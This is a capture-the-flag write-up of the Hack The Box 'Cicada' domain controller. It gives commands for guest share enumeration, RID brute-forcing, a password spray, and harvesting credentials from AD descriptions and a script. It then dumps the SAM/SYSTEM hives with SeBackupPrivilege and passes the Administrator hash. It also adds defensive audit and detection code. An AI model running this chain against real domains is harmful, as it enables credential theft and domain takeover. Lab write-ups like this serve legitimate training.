HTB - Cicada

Target IP: 10.129.231.149
Domain: cicada.htb
DC Hostname: CICADA-DC.cicada.htb
OS: Windows Server (Domain Controller)
Difficulty: Easy
Assumed Breach: No — initial access via unauthenticated enumeration
Author: [g1nt0n1x]


Ⓩ — zbulim notation: Steps marked with Ⓩ were performed automatically by zbulim, my automated recon tool. They are shown manually here for proof of concept and documentation purposes.


1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery Ⓩ

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
| commonName=CICADA-DC.cicada.htb
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0

| smb2-security-mode:
|_    Message signing enabled and required

Port Analysis & Attack Surface

Port      Service   Notes
88/tcp    Kerberos  Domain Controller confirmed
389/tcp   LDAP      Domain: cicada.htb, DC: CICADA-DC.cicada.htb
445/tcp   SMB       Signing required — relay attacks blocked
5985/tcp  WinRM     Remote shell entry point if valid credentials found

Classic AD DC fingerprint. No MSSQL, no web server — pure AD enumeration box.


2. Phase 2: Unauthenticated Enumeration

2.1 Guest Session — Share Enumeration Ⓩ

nxc smb 10.129.231.149 -u 'guest' -p '' --shares
# ADMIN$    NO ACCESS    Remote Admin
# HR        READ         <- Non-standard, interesting
# IPC$      READ         Remote IPC

Guest authentication is enabled. The non-standard HR share is the obvious first target — shares created by admins almost always contain something useful.

2.2 Spider Share Contents Ⓩ

nxc smb 10.129.231.149 -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
# HR/Notice from HR.txt

2.3 Inspect Downloaded File

Notice from HR.txt contents:

"Your default password is: Cicada$M6Corpb*@Lp#nZp!8"

An onboarding notice with a default password left in a publicly readable HR share. We now have a password but no username — we need to enumerate users before we can spray it.


3. Phase 3: User Enumeration via RID Bruteforce

3.1 RID Bruteforce Ⓩ

nxc smb 10.129.231.149 -u 'guest' -p '' --rid-brute
# Administrator
# david.orelious
# emily.oscars
# Guest
# john.smoulder
# michael.wrightson
# sarah.dantelia

RID bruteforcing walks the Security Account Manager (SAM) RID space numerically — querying the domain for the account mapped to RID 500, 501, 502 … up through the high range where regular users sit (1000+). Even with a guest session, the DC answers these SAMR lookups, revealing all domain accounts.

This is how we get a user list without null session --users access. Both techniques hit the same underlying SAMR interface; RID bruteforce is just less selective.


4. Phase 4: Password Spray — Default Password

# One password against all users — not username=password, but a known default
nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
# [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

michael.wrightson never changed their onboarding default password. This is the most common outcome of default-password sprays — at least one user in any large enough organisation will have skipped the mandatory change.


5. Phase 5: Credential Harvesting via User Description

With valid credentials, enumerate all domain users including their metadata. AD user objects have a description field that administrators sometimes use to store notes — including passwords.

nxc smb 10.129.231.149 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
# david.orelious    description: Just in case I forget my password is aRt$Lp#7t*VQ!3

A password stored in a user’s AD description field — visible to any authenticated user in the domain. This is surprisingly common; administrators set it “temporarily” and forget about it.

Credentials found: david.orelious:aRt$Lp#7t*VQ!3


6. Phase 6: Share Enumeration with Escalated Credentials

Each new account potentially unlocks different share access. Always re-enumerate shares after gaining a new credential.

nxc smb 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
# DEV    READ    <- Non-standard, new share
nxc smb 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus -o DOWNLOAD_FLAG=True
# DEV/Backup_script.ps1
# Backup_script.ps1 contents:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force

Cleartext credentials hardcoded in a PowerShell backup script stored in a developer share. Scripts that authenticate to other systems (backup jobs, scheduled tasks, sync agents) are a persistent source of credential leakage.

Credentials found: emily.oscars:Q!3@Lp#M6b*7t*Vt

6.1 Validate & Establish Shell

nxc winrm 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
# [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
 
evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

7. Phase 7: Privilege Escalation — Backup Operators → Administrator

7.1 Enumerate Group Memberships

net user emily.oscars
# Local Group Memberships:   *Backup Operators    *Remote Management Use
# Global Group memberships:  *Domain Users

emily.oscars is a member of Backup Operators — a built-in Windows group that grants two powerful privileges:

whoami /priv
# SeBackupPrivilege     Back up files and directories  Enabled
# SeRestorePrivilege    Restore files and directories  Enabled

7.2 Abuse SeBackupPrivilege — SAM & SYSTEM Hive Dump

SeBackupPrivilege allows reading any file on the system regardless of its DACL, as long as the read is framed as a backup operation. The SAM and SYSTEM registry hives are normally locked and ACL-protected — but with SeBackupPrivilege, reg save can export them freely.

# Export registry hives (bypasses file ACLs via backup semantics)
reg save hklm\sam sam
reg save hklm\system system
 
# Download to Kali via evil-winrm
download sam
download system

7.3 Extract NT Hashes Locally

secretsdump.py -sam sam -system system LOCAL
# [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

The SYSTEM hive contains the boot key used to encrypt the SAM database. secretsdump.py uses the boot key to decrypt the SAM and extract all local account NT hashes.

7.4 Pass the Hash — Administrator

evil-winrm -i 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
# whoami
# cicada\administrator

Domain compromised.


Deep Dive: RID Bruteforcing

Every Windows security principal (user, group, computer) is assigned a Relative Identifier (RID) — a numeric suffix that, combined with the domain SID, forms the full Security Identifier (SID). RIDs follow predictable patterns:

RID    Account
500    Built-in Administrator
501    Guest
502    krbtgt
512    Domain Admins (group)
1000+  Regular user accounts (sequential)

RID bruteforcing works by querying the SAMR interface for each RID in turn and recording which ones resolve to an account name. Even a guest session can trigger these queries on many DCs, because SAMR was designed for directory enumeration and many environments leave it accessible to authenticated (or even guest) connections.

Why it works when --users doesn’t: The --users flag uses a different SAMR call (SamrEnumerateUsersInDomain) that may require higher privileges. RID bruteforce uses SamrLookupIdsInDomain with explicit RID values — a subtly different call that sometimes has weaker access controls.

Detection: Rapid sequential SAMR lookups (Event ID 4661 or Netlogon logging) from a guest account are a reliable detection signal.


Deep Dive: Credentials in AD User Descriptions

The AD description attribute on user objects is readable by any authenticated domain user — it is not protected by default. Administrators often use it for notes, asset tags, or “temporary” reminders. Because it’s not a sensitive field by design, it is almost never audited or reviewed.

Common patterns to look for in descriptions:

  • "pw: <password>" — literal password note
  • "Just in case I forget my password is ..." — this box
  • "Temp pass: <password>, change on first login" — provisioning notes never cleaned up
  • "Service account — contact <admin> for password" — sometimes the password itself follows

How to enumerate at scale:

# Via nxc — shows description column in --users output
nxc smb <target> -u <user> -p <pass> --users
 
# Via ldapsearch — dumps all descriptions directly
ldapsearch -x -H ldap://<dc> -D '<user>@<domain>' -w '<pass>' \
    -b 'DC=domain,DC=local' '(description=*)' sAMAccountName description

Always check descriptions after gaining any new credential — the field only shows up in one query's output and is easy to miss if you're only looking at group memberships.
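A defender-side audit of the description attribute, covering both the Phase 5 finding and the patterns listed above, as an added example that is not part of the original writeup or of nxc. It runs over a constructed set of sAMAccountName/description pairs (the david.orelious line is the one the box exposes; the other accounts and values are made up), flags the credential note styles, and reports each match with the secret redacted so the finding can be ticketed without copying the password around.

```python
import re

# Constructed (sAMAccountName, description) pairs, as an ldapsearch or
# nxc --users dump would return them. The david.orelious entry is the one
# the box exposes; the other accounts and values are made up for this example.
SAMPLE_DESCRIPTIONS = [
    ("david.orelious", "Just in case I forget my password is aRt$Lp#7t*VQ!3"),
    ("svc_backup", "Service account - contact helpdesk for password"),
    ("jane.doe", "Temp pass: Winter2024!, change on first login"),
    ("laptop-user", "Asset tag 4471, Finance dept"),
    ("svc_sync", "pw: Sync#Agent99"),
]

# A credential note almost always has a lead-in word (pw / pwd / pass /
# password) followed by "is", ":" or "=" and then the secret itself; the
# secret runs to the next whitespace, comma or semicolon.
CRED_PATTERN = re.compile(
    r"\b(?:pw|pwd|pass(?:word)?)\s*(?:is|:|=)\s*([^\s,;]+)", re.IGNORECASE)


def redact(secret):
    """Keep the first character only, so a finding can be reported without the password."""
    return secret[:1] + "*" * (len(secret) - 1)


def audit_descriptions(entries):
    """Return [(account, redacted_secret)] for every description that carries a credential."""
    findings = []
    for account, description in entries:
        match = CRED_PATTERN.search(description)
        if match:
            findings.append((account, redact(match.group(1))))
    return findings


def report(entries):
    """Human-readable lines for a ticket or a review meeting."""
    return [f"{account}: description contains a credential ({masked})"
            for account, masked in audit_descriptions(entries)]
```

The "contact helpdesk for password" note is deliberately not flagged: it mentions a password without containing one, which is the false positive a naive keyword search would raise.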


Deep Dive: Backup Operators & SeBackupPrivilege

The Backup Operators group exists so that backup software can read every file on the system without needing to be a full Administrator. It grants two privileges:

Privilege           What it enables
SeBackupPrivilege   Read any file/registry key regardless of DACL, using backup semantics (FILE_FLAG_BACKUP_SEMANTICS)
SeRestorePrivilege  Write any file/registry key regardless of DACL

From an attacker’s perspective, SeBackupPrivilege on a Domain Controller is effectively Domain Admin:

  1. SAM + SYSTEM hive dump (this box) — extract local Administrator NT hash → Pass-the-Hash
  2. NTDS.dit copy — the live database is locked, but SeBackupPrivilege allows using diskshadow or robocopy /B to copy it, then extract all domain hashes with secretsdump.py
  3. File read — read any sensitive file (SSH keys, configuration files, other credentials)

Why reg save works: The reg save command internally opens the registry hive with FILE_FLAG_BACKUP_SEMANTICS, which bypasses the DACL check and uses the privilege check instead. Windows specifically designed this so backup software can export the registry.

Why this is loud: reg save hklm\sam is a well-known attack technique and is detected by virtually all EDR products. For stealth, the NTDS.dit + diskshadow approach with a volume shadow copy is harder to detect, but more complex to execute.

Detection: Event ID 4656 (object access with SeBackupPrivilege) and Event ID 4670 (permissions on an object changed using backup privilege) are the key signals.
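Detection logic for the two signals called out in the deep dives (rapid SAMR lookups from Guest in the RID section, and SeBackupPrivilege handle requests on the SAM/SYSTEM hives here), as an added example that is not part of the original writeup. The events are constructed, already-parsed records in a simplified shape; the field names are assumptions, not the exact Security log schema, and a SIEM would need to map its own fields onto them.

```python
from collections import defaultdict

# Constructed, already-parsed event records in the shape a SIEM might hand
# over. Field names are assumptions, not the real Security log schema. For
# 4661 "object" holds the Object Type (SAM_USER, SAM_GROUP, ...); for 4656
# it holds the Object Name. Timestamps are seconds since the first event.
EVENTS = (
    # 25 SAM lookups from Guest inside five seconds: the RID-brute signature
    [{"id": 4661, "t": i * 0.2, "user": "Guest", "object": "SAM_USER"} for i in range(25)]
    # a helpdesk user resolving a handful of accounts: normal noise
    + [{"id": 4661, "t": 30 + i, "user": "helpdesk", "object": "SAM_USER"} for i in range(3)]
    + [
        {"id": 4656, "t": 60.0, "user": "emily.oscars",
         "object": r"\REGISTRY\MACHINE\SAM", "privileges": "SeBackupPrivilege"},
        {"id": 4656, "t": 61.0, "user": "emily.oscars",
         "object": r"\REGISTRY\MACHINE\SYSTEM", "privileges": "SeBackupPrivilege"},
        # a real backup job touching a data file: uses the privilege, not a hive
        {"id": 4656, "t": 62.0, "user": "backupsvc",
         "object": r"C:\Backups\daily.bak", "privileges": "SeBackupPrivilege"},
    ]
)

# The hives reg save is pointed at in the walkthrough, plus SECURITY for completeness.
HIVE_OBJECTS = {r"\REGISTRY\MACHINE\SAM", r"\REGISTRY\MACHINE\SYSTEM",
                r"\REGISTRY\MACHINE\SECURITY"}

def detect_rid_bruteforce(events, window=10.0, threshold=20):
    """Return accounts raising >= threshold SAM_* lookups (4661) inside any `window` seconds."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4661 and e["object"].startswith("SAM_"):
            by_user[e["user"]].append(e["t"])
    flagged = set()
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(user)
                break
    return flagged

def detect_hive_backup_read(events):
    """Return (user, hive) pairs where a 4656 handle request used SeBackupPrivilege on a hive."""
    return sorted({(e["user"], e["object"]) for e in events
                   if e["id"] == 4656 and e["object"] in HIVE_OBJECTS
                   and "SeBackupPrivilege" in e.get("privileges", "")})
```

The backup service account reading a data file with the same privilege is deliberately left unflagged: the signal is the privilege combined with a hive object, not the privilege alone.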


Key Takeaways & Checklist

  • Always check non-standard shares first — HR, DEV, IT, Backup are admin-created and almost always contain something
  • When you have a password but no username, enumerate users via RID bruteforce before spraying
  • After every new credential, re-enumerate shares — each account has different access rights
  • Check the AD description field on all user objects with --users — passwords stored there are common
  • Scripts in developer shares (DEV, IT, Scripts) frequently hardcode credentials for automation tasks
  • Backup Operators membership = SeBackupPrivilege = read any file on the DC = SAM/NTDS dump
  • reg save hklm\sam + reg save hklm\system → secretsdump.py LOCAL is the fastest Backup Operators exploit
  • The HR → DEV share chain is a pattern: follow non-standard shares at every privilege level